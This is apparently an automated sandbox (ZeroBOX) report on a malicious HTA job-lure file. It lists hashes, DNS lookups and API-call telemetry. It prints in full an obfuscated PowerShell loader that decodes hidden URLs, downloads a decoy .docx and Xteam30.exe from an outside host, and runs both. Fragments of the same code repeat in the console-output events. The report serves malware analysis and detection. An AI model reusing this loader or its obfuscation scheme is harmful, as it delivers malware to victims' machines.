Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Nov. 7, 2024, 1 p.m.	Nov. 7, 2024, 1:10 p.m.

Size	22.6KB
Type	HTML document, ASCII text, with very long lines
MD5	`e4d9fac46b74d05a7110d922393c53b5`
SHA256	`1965c93b0ffdb18abb184528e4f9b90a43586cfa8c08a7f5f5bcd8ad8f90a302`
CRC32	`C51E1857`
ssdeep	`384:AewZKDUSPiVrmsDe8OCuCLfiOEUgPge2uwb7Gw7D+fFU0:fwuKNACtfiOEUgPge2uwb7GoD+e0`
Yara	None matched

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\Xteam30.hta
1172
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function KvGmHPuFs($BcqxEK, $vyAKkT){[IO.File]::WriteAllBytes($BcqxEK, $vyAKkT)};function rfZIzUy($BcqxEK){if($BcqxEK.EndsWith((urRcG @(30019,30073,30081,30081))) -eq $True){Start-Process (urRcG @(30087,30090,30083,30073,30081,30081,30024,30023,30019,30074,30093,30074)) $BcqxEK}else{Start-Process $BcqxEK}};function KcAYN($lUPLD){$wxpeRK = New-Object (urRcG @(30051,30074,30089,30019,30060,30074,30071,30040,30081,30078,30074,30083,30089));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$vyAKkT = $wxpeRK.DownloadData($lUPLD);return $vyAKkT};function urRcG($CxcNOM){$UaHeSgZ=29973;$GKoHyynK=$Null;foreach($rNwOIvboe in $CxcNOM){$GKoHyynK+=[char]($rNwOIvboe-$UaHeSgZ)};return $GKoHyynK};function bPsceQMIo(){$nXOFGcK = $env:APPDATA + '\';$zLOPnasH = KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,30023,30019,30026,30074,30074,30019,30082,30094,30089,30074,30082,30085,30019,30092,30074,30071,30088,30078,30089,30074,30020,30074,30087,30087,30084,30087,30020,30047,30084,30078,30083,30005,30052,30090,30087,30005,30057,30074,30070,30082,30005,30070,30088,30005,30070,30005,30053,30070,30078,30073,30005,30038,30073,30091,30074,30087,30089,30078,30088,30078,30083,30076,30005,30056,30085,30074,30072,30078,30070,30081,30078,30088,30089,30019,30073,30084,30072,30093));$ZiEwaK = $nXOFGcK + 'Join Our Team as a Paid Advertising Specialist.docx';KvGmHPuFs $ZiEwaK $zLOPnasH;rfZIzUy $ZiEwaK;;$KVjfmFmM = KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,30023,30019,30026,30074,30074,30019,30082,30094,30089,30074,30082,30085,30019,30092,30074,30071,30088,30078,30089,30074,30020,30074,30087,30087,30084,30087,30020,30061,30089,30074,30070,30082,30024,30021,30019,30074,30093,30074));$EfTHHfXB = $nXOFGcK + 'Xteam30.exe';KvGmHPuFs $EfTHHfXB $KVjfmFmM;rfZIzUy $EfTHHfXB;;;}bPsceQMIo;
  2120

Name	Response	Post-Analysis Lookup
tp2.5ee.mytemp.website		118.139.176.218

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW Nov. 7, 2024, 1 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 7, 2024, 1 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 7, 2024, 1 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 7, 2024, 1 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Nov. 7, 2024, 1 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 7, 2024, 1 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 7, 2024, 1 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Nov. 7, 2024, 1 p.m.			0	0

Command line console output was observed (50 out of 176 events)

Time & API	Arguments	Status	Return
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net. console_handle: 0x00000023	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol console_handle: 0x0000002f	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: lowing enumeration values and try again. The possible enumeration values are "S console_handle: 0x0000003b	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: sl3, Tls"." console_handle: 0x00000047	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: At line:1 char:469 console_handle: 0x00000053	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: + function KvGmHPuFs($BcqxEK, $vyAKkT){[IO.File]::WriteAllBytes($BcqxEK, $vyAKk console_handle: 0x0000005f	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: T)};function rfZIzUy($BcqxEK){if($BcqxEK.EndsWith((urRcG @(30019,30073,30081,30 console_handle: 0x0000006b	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: 081))) -eq $True){Start-Process (urRcG @(30087,30090,30083,30073,30081,30081,30 console_handle: 0x00000077	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: 024,30023,30019,30074,30093,30074)) $BcqxEK}else{Start-Process $BcqxEK}};functi console_handle: 0x00000083	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: on KcAYN($lUPLD){$wxpeRK = New-Object (urRcG @(30051,30074,30089,30019,30060,30 console_handle: 0x0000008f	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: 074,30071,30040,30081,30078,30074,30083,30089));[Net.ServicePointManager]:: <<< console_handle: 0x0000009b	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: < SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$vyAKkT = $wxpeRK.Downlo console_handle: 0x000000a7	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: adData($lUPLD);return $vyAKkT};function urRcG($CxcNOM){$UaHeSgZ=29973;$GKoHyynK console_handle: 0x000000b3	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: =$Null;foreach($rNwOIvboe in $CxcNOM){$GKoHyynK+=[char]($rNwOIvboe-$UaHeSgZ)};r console_handle: 0x000000bf	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: eturn $GKoHyynK};function bPsceQMIo(){$nXOFGcK = $env:APPDATA + '\';$zLOPnasH = console_handle: 0x000000cb	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,300 console_handle: 0x000000d7	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: 072,30078,30070,30081,30078,30088,30089,30019,30073,30084,30072,30093));$ZiEwaK console_handle: 0x0000011f	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: = $nXOFGcK + 'Join Our Team as a Paid Advertising Specialist.docx';KvGmHPuFs $ console_handle: 0x0000012b	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: ZiEwaK $zLOPnasH;rfZIzUy $ZiEwaK;;$KVjfmFmM = KcAYN (urRcG @(30077,30089,30089, console_handle: 0x00000137	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: 24,30021,30019,30074,30093,30074));$EfTHHfXB = $nXOFGcK + 'Xteam30.exe';KvGmHPu console_handle: 0x00000167	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: Fs $EfTHHfXB $KVjfmFmM;rfZIzUy $EfTHHfXB;;;}bPsceQMIo; console_handle: 0x00000173	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException console_handle: 0x0000017f	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: + FullyQualifiedErrorId : PropertyAssignmentException console_handle: 0x0000018b	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: Exception calling "DownloadData" with "1" argument(s): "The remote name could n console_handle: 0x000001ab	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: ot be resolved: 'tp2.5ee.mytemp.website'" console_handle: 0x000001b7	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: At line:1 char:552 console_handle: 0x000001c3	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: + function KvGmHPuFs($BcqxEK, $vyAKkT){[IO.File]::WriteAllBytes($BcqxEK, $vyAKk console_handle: 0x000001cf	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: T)};function rfZIzUy($BcqxEK){if($BcqxEK.EndsWith((urRcG @(30019,30073,30081,30 console_handle: 0x000001db	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: 081))) -eq $True){Start-Process (urRcG @(30087,30090,30083,30073,30081,30081,30 console_handle: 0x000001e7	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: 024,30023,30019,30074,30093,30074)) $BcqxEK}else{Start-Process $BcqxEK}};functi console_handle: 0x000001f3	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: on KcAYN($lUPLD){$wxpeRK = New-Object (urRcG @(30051,30074,30089,30019,30060,30 console_handle: 0x000001ff	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: 074,30071,30040,30081,30078,30074,30083,30089));[Net.ServicePointManager]::Secu console_handle: 0x0000020b	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: rityProtocol = [Net.SecurityProtocolType]::TLS12;$vyAKkT = $wxpeRK.DownloadData console_handle: 0x00000217	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: <<<< ($lUPLD);return $vyAKkT};function urRcG($CxcNOM){$UaHeSgZ=29973;$GKoHyynK console_handle: 0x00000223	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: =$Null;foreach($rNwOIvboe in $CxcNOM){$GKoHyynK+=[char]($rNwOIvboe-$UaHeSgZ)};r console_handle: 0x0000022f	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: eturn $GKoHyynK};function bPsceQMIo(){$nXOFGcK = $env:APPDATA + '\';$zLOPnasH = console_handle: 0x0000023b	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,300 console_handle: 0x00000247	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: 072,30078,30070,30081,30078,30088,30089,30019,30073,30084,30072,30093));$ZiEwaK console_handle: 0x0000028f	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: = $nXOFGcK + 'Join Our Team as a Paid Advertising Specialist.docx';KvGmHPuFs $ console_handle: 0x0000029b	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: ZiEwaK $zLOPnasH;rfZIzUy $ZiEwaK;;$KVjfmFmM = KcAYN (urRcG @(30077,30089,30089, console_handle: 0x000002a7	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: 24,30021,30019,30074,30093,30074));$EfTHHfXB = $nXOFGcK + 'Xteam30.exe';KvGmHPu console_handle: 0x000002d7	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: Fs $EfTHHfXB $KVjfmFmM;rfZIzUy $EfTHHfXB;;;}bPsceQMIo; console_handle: 0x000002e3	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000002ef	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000002fb	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: Exception calling "WriteAllBytes" with "2" argument(s): "Value cannot be null. console_handle: 0x0000001b	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: Parameter name: bytes" console_handle: 0x00000027	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: At line:1 char:62 console_handle: 0x00000033	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: + function KvGmHPuFs($BcqxEK, $vyAKkT){[IO.File]::WriteAllBytes <<<< ($BcqxEK, console_handle: 0x0000003f	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: $vyAKkT)};function rfZIzUy($BcqxEK){if($BcqxEK.EndsWith((urRcG @(30019,30073,30 console_handle: 0x0000004b	1	1
WriteConsoleW Nov. 7, 2024, 1 p.m.	buffer: 081,30081))) -eq $True){Start-Process (urRcG @(30087,30090,30083,30073,30081,30 console_handle: 0x00000057	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 53 events)

Time & API	Arguments	Status	Return
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472640 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472d40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472d40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472d40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472400 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472400 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472400 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472400 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472400 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472400 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472d40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472d40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472d40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472e80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472f40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472f40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472f40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472f40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472f40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472f40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472f40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472f40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472f40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472f40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472f40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472f40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472f40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472f40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472fc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472fc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472fc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472fc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472fc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472fc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472fc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472fc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472ec0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472ec0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472ec0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 7, 2024, 1 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00472ec0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 7, 2024, 1 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 165 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 524288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02560000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x719f1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x719f2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025a1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02517000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02502000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02515000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02760000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02503000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 7, 2024, 1 p.m.	process_identifier: 2120 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02504000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
